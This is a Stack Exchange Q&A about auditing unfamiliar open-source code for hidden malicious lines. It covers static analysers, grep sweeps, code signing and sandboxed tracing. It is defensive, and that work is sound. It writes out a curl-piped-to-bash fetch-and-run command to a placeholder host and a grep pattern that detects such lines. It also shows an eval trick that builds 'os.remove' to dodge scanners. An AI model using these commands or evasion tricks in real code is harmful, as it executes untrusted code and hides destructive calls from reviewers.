40

How can I check that the source code of an open-source project contains no malicious content? For example, in a set of source files totalling 30,000 lines, there might be one or two lines containing a malicious statement (e.g. calling `curl http://... | bash`).

Those projects are not well-known, and it cannot be assumed that they are well-maintained. Therefore, the security of reusing their source code cannot simply rest on blind trust (while it is a reasonable assumption that it is safe to download, verify, compile and run CMake directly, it doesn't sound good to blindly use an arbitrary library hosted on GitHub).

Someone suggested that I filter the source code, removing all non-ASCII and invisible characters (except trivial ones like line breaks), then open each file in a text editor and manually read every line. This is time-consuming, requires full attention while reading the code, and is actually quite error-prone.
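A first pass like that can at least be scripted rather than done by eye. A rough sketch, assuming GNU grep with `-P`/PCRE support (the demo file and its contents are made up):

```shell
# Demo file: a zero-width space (U+200B) hidden in an otherwise plain script
mkdir -p demo && printf 'curl http://x\342\200\213.test | bash\n' > demo/build.sh

# List files containing bytes outside printable ASCII, tab, CR and LF
grep -rlP '[^\x09\x0A\x0D\x20-\x7E]' demo/
```

This only finds the suspicious characters; deciding whether they are malicious still takes a human.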

As such, I'm looking for general methods to handle this kind of situation. For example, are there any standard tools available? Is there anything I should pay attention to if I really have to read the code manually?

Luc
tonychow0929
  • 2
    There are static code analysers. Have you looked into those tools? – schroeder Oct 26 '18 at 12:51
  • Yes, but I have a (possibly wrong) feeling that they employ a blacklisting instead of whitelisting (something like antivirus) which has little use on specifically crafted malicious contents. – tonychow0929 Oct 26 '18 at 13:06
  • 2
    SAST is not just a pattern-based blacklisting tool, it's more complex. A mature SAST solution collects every input and every output point of an application, builds every possible dataflow between them, and then analyses every internal point where unintended behaviour like data tampering could happen. – odo Oct 26 '18 at 13:14
  • for example, packages in ecosystems like npm/Python are pulled in by the dozen by developers, yet there is no review process to accept a component. To make the question less general, do you have a focus on a specific ecosystem? – J. Doe Oct 26 '18 at 13:29
  • Not quite. I’m mainly working with mobile applications, and a lot of programming languages will be used e.g. Swift (with Xcode), Java (both Android and server side), C++ (sharing code), JavaScript, Dart etc – tonychow0929 Oct 26 '18 at 13:40
  • 1
    Run the project in a docker container with the least capabilities that it should need and giving it permissions to modify only the files it should need. If the program fails for some permission error verify what it is trying to do. If the request is legitimate allow it and go on, otherwise you found something fishy. – Bakuriu Oct 26 '18 at 17:41
  • This is a good question. There's a lot that could be done in theory but in practice most people just trust dependencies. One issue is that the best code analysers are expensive commercial tools. Although there are good free tools for some languages. Subtle difference between determining if code is malicious or whether it has security flaws. – paj28 Oct 26 '18 at 23:30
  • 1
    note, it [can be pretty hard](https://en.wikipedia.org/wiki/Underhanded_C_Contest) to determine that some piece of software contains malicious content if the author took some effort to hide it. – Matija Nalis Oct 28 '18 at 00:32
  • The quick solution(s) you listed wouldn't account for tricky tactics, like if the code is base 64 encoded or obscured in some other way. – Justin Oct 29 '18 at 00:40
  • 1
    @Bakuriu I'd like to add that you could `strace` all system calls, and see if something fishy is going on, for instance, the application attempting to stat files it doesn't need to care about. – Ultimate Hawk Oct 29 '18 at 09:17

5 Answers

22

There are automated and manual approaches.

For the automated approach, you could start with LGTM, a free static code analyser for open-source projects, and then move on to more complex SAST solutions.

For the manual approach, you could build a threat model of your app and run it through the OWASP ASVS checklist, starting from its most critical parts. If file deletion is in your threat model, just run something like: `grep -ir 'os.remove('`.

Of course, it's best to combine both.
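That grep idea generalises into a quick sweep over the whole tree. A rough sketch (the patterns and file contents below are illustrative, not exhaustive, and treat hits as leads for manual review, not verdicts):

```shell
# Demo tree with one suspicious line (placeholder content)
mkdir -p src && printf 'curl http://example.test/x | bash\n' > src/setup.sh

# Sweep for a few dangerous primitives from the threat model
grep -rniE \
    -e 'os\W+(remove|unlink|rmdir)' \
    -e '\beval *\(' \
    -e 'curl[^|]*\|\s*(ba)?sh' \
    src/
```

Extend the pattern list per language and per threat model; each hit points you at a line worth reading in context.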

odo
  • 17
    "If there is file deletion in your threat model - just call something like this: `grep -ir 'os.remove('`.": though if I do `os['remove']('` I've immediately defeated you. – The6P4C Oct 27 '18 at 04:03
  • @The6P4C Then it's another trust problem about coding conventions, though malicious code is often deliberately camouflaged. – iBug Oct 27 '18 at 13:52
  • @The6P4C sure, if `grep` was my only tool. But not that easy, because your exploit could be detected with `os\W+remove\W+`. – odo Oct 28 '18 at 13:08
  • 3
    @odo then I'd do `os.unlink` or even `shutil.move`. Against a mildly determined attacker this approach stands no chance. – Calimo Oct 28 '18 at 14:35
20

You either do it yourself or trust someone else

As with most things in life, you must either do it yourself or trust someone else with it. Here trusting covers both having no malicious intent and being competent enough to properly perform the task.

For example, you could file your taxes yourself or trust a tax adviser to do so (who not only should not attempt to defraud you, but also know how to file the taxes!).

If you are a company, "doing it yourself" actually means having it performed by one or more of your employees, who in turn need to be trusted.

The third party you trust doesn't need to be a single person, either. It could be the Microsoft Windows development team, or the WordPress core developers.

On source code security, you want the expert not only to be well-meaning, but also knowledgeable enough to code the program in a secure way and to find any potential security issues that may be there.

(Plus a few additional boundary concerns when the system is treated as a whole: e.g. you want their code not to have been compromised while they uploaded it to the repository, and the email from your employee reporting the results not to have been replaced by a malicious hacker inside your network claiming the application was fine.)

You will need to evaluate your options, assess the risk associated with each one, and choose the path that best suits your interests (and budget!).

If I were to check the security of the source code of a blog that used WordPress, I would generally trust that the original code was fine¹ and check the differences between the official version and the version in use. If the website was compromised, that would make it much easier to find out.

¹ Obviously checking the changelog of later versions if it used an outdated one.

However, if it was developed by the nephew of the owner, I would expect to find lots of vulnerabilities there, and would recommend a thorough checking of everything.

In your case, you should weigh the risk and cost of developing an equivalent of that library in-house (take into account that the chance of issues in your in-house product is not zero either, and will depend, amongst other things, on the quality of the people involved) against the risk and cost of auditing and using that library.

Now, there may be attenuating factors that simplify the auditing. For example, if the untrusted code can run in an isolated Virtual Machine, that may be enough to not need further auditing (even here, you are trusting the VM implementation). Or it may be considered sufficient to audit the parts of that program that run as root.

For auditing a library, code analysers can help point out problematic parts (as noted elsewhere), but in order to consider it clean I would actually have someone read and understand the code, even if only superficially.

For instance, the ability to remove arbitrary files is not malicious per se. You need to understand the program in order to know if it makes sense.

Again, it is a matter of the threats and risks for what you are doing. If you are only concerned with the library exfiltrating data, filtering connections at the firewall could be enough. If you are concerned with the library deleting important files (and for some odd reason you can't deny such permission), you could simply scroll by a bunch of code that only did mathematical computations. If that library computes the parameters for launching a rocket... well, you better make sure those computations are correct, too!

Ángel
3

Use a service

There are professional services such as Black Duck and Whitesource that audit open-source dependencies.

DawnPaladin
  • 1
    Black Duck doesn't check the code of OS dependencies. They check whether the dependency (at the version shipped with your app) has a **known** vulnerability listed in CVE databases. Please correct me if I am wrong. Source: I receive regular BlackDuck reports from one of our customers. – usr-local-ΕΨΗΕΛΩΝ Oct 27 '18 at 12:04
  • I would also list/recommend VeraCode (veracode.com). I am not affiliated. My company used it once. It scans your non-obfuscated binaries, thus including OSS code, for known vulnerability patterns. Shell commands, usage of old cryptographic algorithms, "phone-home" invocations and other patterns are scanned along with XSS, CSRF vulnerabilities etc. – usr-local-ΕΨΗΕΛΩΝ Oct 27 '18 at 12:06
2

If you use someone else's code, then you are more or less at the mercy of the integrity mechanisms the maintainers provide; that's true of all software, not just open source.

For both commercial and packaged open-source software (i.e. rpm, deb, etc.), code signing is common; this proves that what you have received is what the signer intended you to receive.

In the case of source code, checksums are usually used. But these have little value unless the checksum is obtained from a different source than the source code itself.

Note that these are only intended to protect against a MITM type attack on the application.
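In practice, checksum verification looks something like this (a sketch; the file names are placeholders, and the `.sha256` file would ideally come from a different channel than the archive itself):

```shell
# Placeholder release archive and its published checksum file
printf 'release contents\n' > project-1.0.tar.gz
sha256sum project-1.0.tar.gz > project-1.0.tar.gz.sha256

# Verify: prints "project-1.0.tar.gz: OK" on success,
# and fails loudly if the archive has been tampered with
sha256sum -c project-1.0.tar.gz.sha256
```

For signed releases, the analogous step is verifying a detached signature, e.g. `gpg --verify project-1.0.tar.gz.asc project-1.0.tar.gz` (again, placeholder names), after obtaining the signer's key through a channel you trust.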

use an arbitrary library hosted on GitHub

...in which case all the files/versions have a hash published on GitHub. In order to subvert this, an attacker would need to subvert GitHub itself or the maintainer's GitHub account: I can fork anything on GitHub, but it is then attributed to me, and the original repository is unaffected unless the maintainer accepts my pull requests. You may have more confidence in the integrity of GitHub than in the maintainers of the code, in which case it would be reasonable to trust a hash published in the same place as the source code.

None of these mechanisms provide protection against malware which was injected before the integrity verification was applied.

Where you have access to the source code, you have the option of examining the code (which is a lot easier than examining the executables), and there are automated tools for doing so, such as those odo suggests.

symcbean
1

Static analyzers won't always work

Checking for `os.remove` anywhere in the code will not stop all attackers, as some may simply do `eval("os" + ".remove")`. Even more advanced regexes can be written, but the attacker can always make their code more complicated, case in point:

x = "r"
eval("os." + x + "emove")
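Indeed, such an obfuscated call slips straight past a naive pattern sweep. A throwaway demo (the file name is made up, and the pattern is the one suggested in the comments on the first answer):

```shell
# Write the obfuscated payload to a file and sweep it
printf 'x = "r"\neval("os." + x + "emove")\n' > payload.py

# grep -c counts matching lines: prints 0, because the literal
# string "remove" never appears contiguously in the source
grep -cE 'os\W+remove' payload.py
```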

More theoretically, due to the halting problem, it is impossible in general to check all potential program states to see whether a dangerous system call is invoked.

An attacker can avoid static code analyzers quite easily by building a small interpreter for a custom language that performs the malicious operations.

Running the code inside a container/honeypot

All software eventually interacts with the operating system. By running the software inside a container or honeypot with strace or a similar tool, you can see what information the program or library is attempting to gather.

Does the program attempt to figure out if it's running inside a container? Does it read files it is not supposed to or even modify them? Then you may have a malicious piece of software.
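A minimal version of that setup might look like this (a sketch, assuming Docker and strace are installed; the image, program name, and paths are all placeholders):

```shell
# Run the untrusted code with no network and no capabilities;
# the source tree is mounted read-only
docker run --rm --network none --cap-drop ALL \
    -v "$PWD/src:/src:ro" alpine:3.19 /bin/sh -c 'ls /src'

# Log every file-related syscall and outbound connection attempt;
# files it touches outside its own tree are a red flag
strace -f -e trace=%file,connect -o syscalls.log ./untrusted-tool
grep -E 'connect|open' syscalls.log
```

Tightening the container (read-only root filesystem, seccomp profiles, resource limits) narrows what the code can even attempt, which makes the trace easier to interpret.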

This won't always work; some manual inspection may be necessary

Some malicious code triggers only on specific dates, but at least you'll see that the date is being accessed. From there you can inspect where in the code this happens and why.